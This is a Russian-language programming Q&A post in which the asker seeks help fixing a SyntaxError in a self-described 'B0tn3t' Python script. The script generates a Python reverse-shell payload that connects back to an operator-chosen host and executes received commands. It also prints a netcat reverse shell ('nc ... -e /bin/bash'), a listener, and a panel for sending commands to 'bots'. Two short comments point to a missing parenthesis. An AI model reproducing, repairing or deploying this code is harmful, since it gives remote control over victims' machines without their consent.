# Ошибка SyntaxError Python3

Tags: python-3.x, syntax

```
    #!/usr/bin/python3
import os, time, socket
def payload():
    os.system("clear")
    os.system("toilet --metal PAYLOAD")
    print("\x1b[31mChoose payload mode:")
    print("1) Python payload")
    print("2) Netcat payload")
    mode = input("\x1b[35mSo?   ")
    if mode == "1":
        os.system("clear")
        os.system("toilet --metal PAYLOAD")
        ip = input("\x1b[35mEnter your LHOST:   ")
        pyport = input("Enter your LPORT:       ")
        code = "import socket; sock = socket.socket(); sock.connect((\""+ip+"\", "+pyport+"));\nwhile True:\n   cmd = sock.recv(16384)\n    try:\n      exec(cmd.decode(\"utf-8\"))\n   except:pass"
        f = open("handler.py", "w")
        f.write(code)
        print("\x1b[0m[\x1b[32m*\x1b[0m]Your handler is ready! Name:handler.py"); time.sleep(5)
    if mode == "2":
        os.system("clear")
        os.system("toilet --metal PAYLOAD")
        print("\x1b[31mMake sure, that you have netcat installed!!!")
        ip = input("\x1b[35mEnter your LHOST:   ")
        port = input("Enter port to make connection:    ")
        code = "nc -nv "+ip+" "+port+" -e /bin/bash"
        print("\x1b[37mType this to the linux or termux prompt: "+code)
        print("Use this to initalize handler: nc -lvp "+port)
        input("\x1b[32mPress ENTER to continue...")
def control():
    os.system("clear")
    os.system("toilet --gay C0NTR01")
    print("Creating socket...")
    botnet = socket.socket()
    botnet.bind(("", pyport))
    botnet.listen(20)
    print("\x1b[0m[\x1b[32m*\x1b[0m]Handler ready!")
    print("\x1b[0m[\x1b[32m*\x1b[0m]Waiting for connection...")
    bot, addr = botnet.accept()
    os.system("clear")
    os.system("toilet --metal B0T PAN3L")
    print("\x1b[0m[\x1b[32m*\x1b[0m]New bot!")
    while True:
        print("Enter python commands to the target")
        cmd = input("\x1b[31mb0t\x1b[0m@\x1b[38b0tn3t\x1b[0m>>> ")
        bot.send(bytes(cmd, encoding="utf-8")
def botnet():
    os.system("clear")
    os.system("toilet --gay B0TNET")
    print("\x1b[33m")
    print(" 1) Create payload")
    print(" 2) Control bots by pyhandler")
    cmd = input("\x1b[34m[b0tnet@local]>>>")
    if cmd == "1":
        payload()
    elif cmd == "2":
        control()
while True:
    try:
        botnet()
    except KeyboardInterrupt:
        os.system("clear")
        print("\x1b[32mThanks for using B0tn3t!!!")
        exit()
```

Выдаёт ошибку, я гуглил уже несколко раз. Конкретно, ошибка возникает в функции botnet(). Помогите пж!

Comment: Добавьте в вопрос полный текст ошибки.

Comment: bot.send(bytes(cmd, encoding="utf-8")  Нет закрывающей. Но это другая ошибка, а так как вы лепите дальше то получаете Invalid syntax